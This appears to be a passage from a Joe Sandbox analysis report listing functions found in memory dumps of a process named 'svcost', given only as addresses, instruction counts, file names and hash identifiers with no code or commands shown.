                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bb38a1a8a3619d52c4e12b2423e64b12d7493f4deaa26daecb034473511ca6f8
                                                                                            • Instruction ID: 687b75fd0ed169b45ed124778ebd77d87b197b2f5f7882413a28d4695c71ac9c
                                                                                            • Opcode Fuzzy Hash: bb38a1a8a3619d52c4e12b2423e64b12d7493f4deaa26daecb034473511ca6f8
                                                                                            • Instruction Fuzzy Hash: 80A12474E85218CFEB24CF69D998BADBBF1BB49304F1090BAD009EB251D7755984CF82
                                                                                            Function 0211C93C Relevance: .2, Instructions: 183COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 50221bf5c9021685129ee8f75c0022f25d0f4d9f4c077ba989a93705bf40408f
                                                                                            • Instruction ID: 2a52b63bd5f850924a56632501f2dd6bb341489cd1abb9bf1ad385b8e4987c6c
                                                                                            • Opcode Fuzzy Hash: 50221bf5c9021685129ee8f75c0022f25d0f4d9f4c077ba989a93705bf40408f
                                                                                            • Instruction Fuzzy Hash: 0B812774E85218CFEB24CF69D994BADBBF1BB49314F2090BAD009E7251D7715984CF82
                                                                                            Function 0211CBA1 Relevance: .2, Instructions: 180COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bb2ec485af07350ed7482a95a035f7438abcab239d4b50a7bd5d17e98833978c
                                                                                            • Instruction ID: d4b0db85c6d40d15e256ece5a54680284c1064b82a2dd2ce26590e3d99e2a1d3
                                                                                            • Opcode Fuzzy Hash: bb2ec485af07350ed7482a95a035f7438abcab239d4b50a7bd5d17e98833978c
                                                                                            • Instruction Fuzzy Hash: 0B812474E85218CFEB24CF69D994BADBBF1BB49314F2090BAD009EB251D7715984CF82
                                                                                            Function 0211CD2E Relevance: .2, Instructions: 180COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3e18d0b59c42c07144a7ebc4530b7ad9da20be156798b920897a69b6cd50e854
                                                                                            • Instruction ID: 5ddc0a4fba789cd838eee83f455cd81ee52c4c4bd667478edec9961805f0e5f8
                                                                                            • Opcode Fuzzy Hash: 3e18d0b59c42c07144a7ebc4530b7ad9da20be156798b920897a69b6cd50e854
                                                                                            • Instruction Fuzzy Hash: 92811474E85218CFEB24CF69D994BADBBF1BB49314F2090BAD009E7251D7715A84CF82
                                                                                            Function 0211CEF1 Relevance: .2, Instructions: 170COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1a0a210fcd7060761a865eb6e3f1f92ba7beeda22209e837b99576b85ace7409
                                                                                            • Instruction ID: b179526370331128e8efe329b93a70880e386e2e12867f081abede2dabc1ba3d
                                                                                            • Opcode Fuzzy Hash: 1a0a210fcd7060761a865eb6e3f1f92ba7beeda22209e837b99576b85ace7409
                                                                                            • Instruction Fuzzy Hash: BA711674D86209CFCB04CFA9D588AEEBBB2FF89301F11906AD419B7250D7345946CF92
                                                                                            Function 0211CA0E Relevance: .2, Instructions: 153COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 76df50959568bda02520625c14d8c64f72e26800f1d40ce7b660ca06abb52bee
                                                                                            • Instruction ID: 15d3994b49bebbc3a86e14fbae110b0bbe11110a9b697b223f5b9e039ed15e62
                                                                                            • Opcode Fuzzy Hash: 76df50959568bda02520625c14d8c64f72e26800f1d40ce7b660ca06abb52bee
                                                                                            • Instruction Fuzzy Hash: D4613670E89218CFEB24CF69D854BADBBF1BB45304F2090BAD009EB291D7755980CF82
                                                                                            Function 0211E688 Relevance: .1, Instructions: 143COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8c41879adbff837abbe3c9a617985927ebefed819ca01d8fd1912af9500ae565
                                                                                            • Instruction ID: 7ea8d1d802b24568b73fb7b212e69356fdedf86d0b25b5bad8bec2f89bad5510
                                                                                            • Opcode Fuzzy Hash: 8c41879adbff837abbe3c9a617985927ebefed819ca01d8fd1912af9500ae565
                                                                                            • Instruction Fuzzy Hash: 8E515174B00609DFDB04EF64E858AAEBB76FFC8711F00812AE54297364DF74A946CB81
                                                                                            Function 0069F1C1 Relevance: .1, Instructions: 128COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1aa38a44f8fa2b864a41e18183fbbbb7f2b289820c9b091762434b2d4223a877
                                                                                            • Instruction ID: 7ba0643a2700c0cfad1ab0289f92d18acdbf4e4b9c54d19655409b81604540b3
                                                                                            • Opcode Fuzzy Hash: 1aa38a44f8fa2b864a41e18183fbbbb7f2b289820c9b091762434b2d4223a877
                                                                                            • Instruction Fuzzy Hash: 94510874E052189FDB04DFA9D454BEEBBF6EB8A300F21806AE405E7754DB359941CF90
                                                                                            Function 0069F1D0 Relevance: .1, Instructions: 124COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fbbb1dbe38c8088ac71a76a37b4b5dfd5298e40d605a6ce96207e6fa2ee567d7
                                                                                            • Instruction ID: 290e091bb807dc34d55ed141615c0a02b0406ede07be607abb6b0eca53d2447e
                                                                                            • Opcode Fuzzy Hash: fbbb1dbe38c8088ac71a76a37b4b5dfd5298e40d605a6ce96207e6fa2ee567d7
                                                                                            • Instruction Fuzzy Hash: 2451E778E012189FDB04DFA9D454BEEBBF6EB8A300F21802AE415A7354DB759941CF94
                                                                                            Function 0211EEB9 Relevance: .1, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1662dd12617e578d7649f9c735165ce0bf12a5661f467b45baf1ab3a824e0d17
                                                                                            • Instruction ID: 19e5932211e6c6de4839023e8ce4a3c98d51f36f7b53538816a821614b4958b1
                                                                                            • Opcode Fuzzy Hash: 1662dd12617e578d7649f9c735165ce0bf12a5661f467b45baf1ab3a824e0d17
                                                                                            • Instruction Fuzzy Hash: 7B41C574B41115DFD708DBA4D998BADBBB2FF89304F208165E9059B3A1CB71EC42CB40
                                                                                            Function 023AB658 Relevance: .1, Instructions: 101COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 21eaefa1eeabf03424c42c74f8591dd9d704c085f11d1e4011837674e824d487
                                                                                            • Instruction ID: 8e6dedbbd0b2e3d4117149bd855de84847ca4403e5a167c98cae8f497f80f213
                                                                                            • Opcode Fuzzy Hash: 21eaefa1eeabf03424c42c74f8591dd9d704c085f11d1e4011837674e824d487
                                                                                            • Instruction Fuzzy Hash: 1F416931A002198FCB14CFA5C854AAEFBF2FF98319F00853AD405EB2A1DB75E945CB90
                                                                                            Function 002F0870 Relevance: .1, Instructions: 99COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0e8e8f2ec5d41a07e850cfb2156d752b1cefa7fe6909842f476df487e89d739a
                                                                                            • Instruction ID: 2ade380a89d00cfe6ce2b9c64ce3d38a15c9ea31ebb547db749a3bb222e0fed2
                                                                                            • Opcode Fuzzy Hash: 0e8e8f2ec5d41a07e850cfb2156d752b1cefa7fe6909842f476df487e89d739a
                                                                                            • Instruction Fuzzy Hash: 4A31C671E003098FCB04DFB8C8555AEBFB2EF89311F1586A9D505FB2A2E770A945CB90
                                                                                            Function 023A6067 Relevance: .1, Instructions: 97COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 789638ee3c9d245e7be969d31115688188ae879dbce7567fb026124e80932fbb
                                                                                            • Instruction ID: 9c8a9123cf43b03f5d4f02040b1303fa6fdd3675d236f58d43085bf24c7c2d19
                                                                                            • Opcode Fuzzy Hash: 789638ee3c9d245e7be969d31115688188ae879dbce7567fb026124e80932fbb
                                                                                            • Instruction Fuzzy Hash: D4411274D0A218DFDB00CF98D95ABEEBBFAFB49300F14806AD404A7252C3754A89CF51
                                                                                            Function 002F0B19 Relevance: .1, Instructions: 91COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5468b7e378d0e9635e29c8296830180abf14e1014f4fb7fe7da32495bca6b8d2
                                                                                            • Instruction ID: 0dee72885a5e38bd511b676bcec4156db15ab1a373c34b02c8358c2ba89eb693
                                                                                            • Opcode Fuzzy Hash: 5468b7e378d0e9635e29c8296830180abf14e1014f4fb7fe7da32495bca6b8d2
                                                                                            • Instruction Fuzzy Hash: 3531E771E002089FEB04DFA5C88069EFBF6EF89350B14857AE806A7311DB31AD55CB90
                                                                                            Function 0211DF20 Relevance: .1, Instructions: 90COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fae3083c3a6ca0fe8a372fe5a2d1ae35b470408c62ca3c090303845c7312f2f7
                                                                                            • Instruction ID: a004490596d7c23128d12cbdbc3ddc069a8cee9d10f8c3d0eba538bf1e50ebfa
                                                                                            • Opcode Fuzzy Hash: fae3083c3a6ca0fe8a372fe5a2d1ae35b470408c62ca3c090303845c7312f2f7
                                                                                            • Instruction Fuzzy Hash: 87219E35700210DFCF499FA4C858A69BBB2EF8D310B1541B9E905AB3A2CF31EC12DB91
                                                                                            Function 0211F428 Relevance: .1, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1e8472c8fa67e4d74a752083c937a1939e37624ad0fc11a6b5d48a052d1ef103
                                                                                            • Instruction ID: 560dda7e9241d907055d9b53984dc6ab572db7a745842980de1692db2e9b09ce
                                                                                            • Opcode Fuzzy Hash: 1e8472c8fa67e4d74a752083c937a1939e37624ad0fc11a6b5d48a052d1ef103
                                                                                            • Instruction Fuzzy Hash: 7821D3313053108FD3259B69E858A66BBE9FFC4365B09C5BAE10DC7E52DB31E842C760
                                                                                            Function 002F0C51 Relevance: .1, Instructions: 83COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0076b7ef3666eab6bdf0ef3903b638bb2e9591368c7f089b9ae500287d61c57c
                                                                                            • Instruction ID: db805f2c082169bd1c3601b6d85d4c51bf317b876868a40b392f49ce918bf53d
                                                                                            • Opcode Fuzzy Hash: 0076b7ef3666eab6bdf0ef3903b638bb2e9591368c7f089b9ae500287d61c57c
                                                                                            • Instruction Fuzzy Hash: C8316470A10219CFCB10DFE9C484AADFBF1EF48364F55816AE519AB212D774AC91CFA0
                                                                                            Function 023A5DA0 Relevance: .1, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 76929a026715ff1c737984ae588fa78540d030d9612f6c0a9a8b06d925f19586
                                                                                            • Instruction ID: ab9906e7937e316f0839ce8ae7fbd017c0741a2f40bd24589f7257334e0ea8a1
                                                                                            • Opcode Fuzzy Hash: 76929a026715ff1c737984ae588fa78540d030d9612f6c0a9a8b06d925f19586
                                                                                            • Instruction Fuzzy Hash: 5F312274E012089FCB09DFA5D864AEEBBB2FF89300F14806AE446B73A1DB315901CF90
                                                                                            Function 002F8CC8 Relevance: .1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0e127a09752144b383aa22979a6c27cfc8d4514abeafbb1b26a0e27471f37b14
                                                                                            • Instruction ID: abae6c7a9baf397855af6d23425af6dd07e5b83c0ab3062a58eb669ee4f4fde7
                                                                                            • Opcode Fuzzy Hash: 0e127a09752144b383aa22979a6c27cfc8d4514abeafbb1b26a0e27471f37b14
                                                                                            • Instruction Fuzzy Hash: DF3100B4A10209CFDB04DFA9C888AAEFBF5FF49301F209476D509A7260DB759A44CF60
                                                                                            Function 023AE528 Relevance: .1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 85888f4229597d5c2a8f4904f16d28fed36dddecceecb4c4ca1caabfb1c964e8
                                                                                            • Instruction ID: 8045d7b0f41986878e647a345818791ac5bfe1b840de8f5573a05fe6c11594c7
                                                                                            • Opcode Fuzzy Hash: 85888f4229597d5c2a8f4904f16d28fed36dddecceecb4c4ca1caabfb1c964e8
                                                                                            • Instruction Fuzzy Hash: 0F213B743042549FDB05DF29D850AAA7BEAEF4A604F1940B5F855CB2A2DA35DC50CB60
                                                                                            Function 0069D7C8 Relevance: .1, Instructions: 76COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d0567a90ce04c28a9291cbbd811f2f882ec86ead86b45057702aa837970534a6
                                                                                            • Instruction ID: b5088293daa536a93cbaa75ce14b738ff5e48617c648af1b11489e6791f8c4a8
                                                                                            • Opcode Fuzzy Hash: d0567a90ce04c28a9291cbbd811f2f882ec86ead86b45057702aa837970534a6
                                                                                            • Instruction Fuzzy Hash: 84319A74E09249DFCB04DFA8C955AEEBBF6AB4A300F1080A6D405AB791D7349905CF91
                                                                                            Function 023AD6E0 Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 719c45886df208698914b21944c8eef759604783d98eb0652e5130cea65c0fea
                                                                                            • Instruction ID: cc30fae16c54499c204e528a9a3c67b8aae46ad99a814da7c1d679ae49abbf7b
                                                                                            • Opcode Fuzzy Hash: 719c45886df208698914b21944c8eef759604783d98eb0652e5130cea65c0fea
                                                                                            • Instruction Fuzzy Hash: 34214871A00209DFDB48DFB4C814BAEBBF5EB44340F108076E515DBA91E736DA44CB91
                                                                                            Function 0014D048 Relevance: .1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515026689.000000000014D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0014D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_14d000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6d9d43c08be59aa95f2c56cacfa0b5fe365aae6dd355e7145c5fefa2b68cf8f1
                                                                                            • Instruction ID: 0bdefae68471b3e474bf04d52f172fbf45d17686d2a7be071103aced4a708ee3
                                                                                            • Opcode Fuzzy Hash: 6d9d43c08be59aa95f2c56cacfa0b5fe365aae6dd355e7145c5fefa2b68cf8f1
                                                                                            • Instruction Fuzzy Hash: 0221F5B1604340DFEF15CF14E9C4B26BB65EB84714F34C569E8095B251C336D816CBA2
                                                                                            Function 023AB649 Relevance: .1, Instructions: 73COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 03c5c454f58d0df004a408452f4a88df3f7eeb72d1de2627d4b0e4aff140e58c
                                                                                            • Instruction ID: 2990c7aa0f9abcf708e241f5d8731379f6fc69b1b7c314603e7f86238cacab41
                                                                                            • Opcode Fuzzy Hash: 03c5c454f58d0df004a408452f4a88df3f7eeb72d1de2627d4b0e4aff140e58c
                                                                                            • Instruction Fuzzy Hash: 18215E74A04215CFCB14DF78C8A4AAEBBF2FF98314F01467AD906A7361D775A845CB90
                                                                                            Function 023A9E18 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0934fd72dbe7e875e290950d8af303169700938e5df732a0bf88c20d326e188a
                                                                                            • Instruction ID: 224f5ef3de82544e94d411ac8939423880f13ef3b62f2d23ba7f3ff5015c15e9
                                                                                            • Opcode Fuzzy Hash: 0934fd72dbe7e875e290950d8af303169700938e5df732a0bf88c20d326e188a
                                                                                            • Instruction Fuzzy Hash: 11218171A04249DFCB14CFA8C854ADEBFB6EB8D720F148229E511B7391DF759841CB94
                                                                                            Function 0069D7D8 Relevance: .1, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b5235389ed8bd29f742a3093bff17d0be5b6095b94f8741a3ff5ed509ed2f513
                                                                                            • Instruction ID: b866fc444ea9953799a6a523407ff35e08c6114467ff6bcb78410dece7663566
                                                                                            • Opcode Fuzzy Hash: b5235389ed8bd29f742a3093bff17d0be5b6095b94f8741a3ff5ed509ed2f513
                                                                                            • Instruction Fuzzy Hash: E12153B4E05208DFCF04DFA9D985AEEBBFAAB49300F108466D409AB751D7349945CF90
                                                                                            Function 002F0A20 Relevance: .1, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 44515b06c376911371fccbd052915f3656dc1275621e42f2f2d6025a4b5db39c
                                                                                            • Instruction ID: 89951d221514644472e4595a25ed42be365a9957bb8500f1a5cb10550186ead2
                                                                                            • Opcode Fuzzy Hash: 44515b06c376911371fccbd052915f3656dc1275621e42f2f2d6025a4b5db39c
                                                                                            • Instruction Fuzzy Hash: DB21D371A003198FDF24CF69C84499EBBF1FF48350B100A2DE496EB292DB30A844CB60
                                                                                            Function 002F0A0F Relevance: .1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c470be4dc40d2ac7d0232d9f7666c318ae2591e8f01ffbfac93078475ac36f56
                                                                                            • Instruction ID: 6e80f5ceea68bb70399e5707be3bec8c5ab0f5c5c9631e0065676357f2fab5c4
                                                                                            • Opcode Fuzzy Hash: c470be4dc40d2ac7d0232d9f7666c318ae2591e8f01ffbfac93078475ac36f56
                                                                                            • Instruction Fuzzy Hash: AB210130A103199FDB14CF65C8449EEBBF5EF45350B140579E586A72A2EB70A848CB60
                                                                                            Function 023A97A0 Relevance: .1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2533471fd99eb3d77c502074d23eb7d6b7f69bf779c36f1760ac9f8f00e47564
                                                                                            • Instruction ID: 99b7eebcb94876bc1c46696db825d395c04c4ce09d3f4055bcc7567ee0c117a4
                                                                                            • Opcode Fuzzy Hash: 2533471fd99eb3d77c502074d23eb7d6b7f69bf779c36f1760ac9f8f00e47564
                                                                                            • Instruction Fuzzy Hash: 4B210470600301CFDB08EBA8E8597AE7BE6EF84301F408A3DE00ACB685DF79590587A4
                                                                                            Function 0211D9F8 Relevance: .1, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5b43be7f37ee04c29a008daacf21f185ae33d3281f40bea44362a68bc6083721
                                                                                            • Instruction ID: 3737be5f6a51e776916823a7aa1ba9de5a6a754b045d08a2d933e027f0690207
                                                                                            • Opcode Fuzzy Hash: 5b43be7f37ee04c29a008daacf21f185ae33d3281f40bea44362a68bc6083721
                                                                                            • Instruction Fuzzy Hash: 25212AB4D08209DFCB08DFA9E4446AEBBF1FB85305F1081BAD414A7394D7349981CF91
                                                                                            Function 002F0861 Relevance: .1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 52767d49ff4d6ee7144086d4cb5e36347001b8698377214ad0008fba5cd88279
                                                                                            • Instruction ID: 44e2098c911015187162d02f86b23ebb4fb5634e5d4206a7c1562e04873fa2cf
                                                                                            • Opcode Fuzzy Hash: 52767d49ff4d6ee7144086d4cb5e36347001b8698377214ad0008fba5cd88279
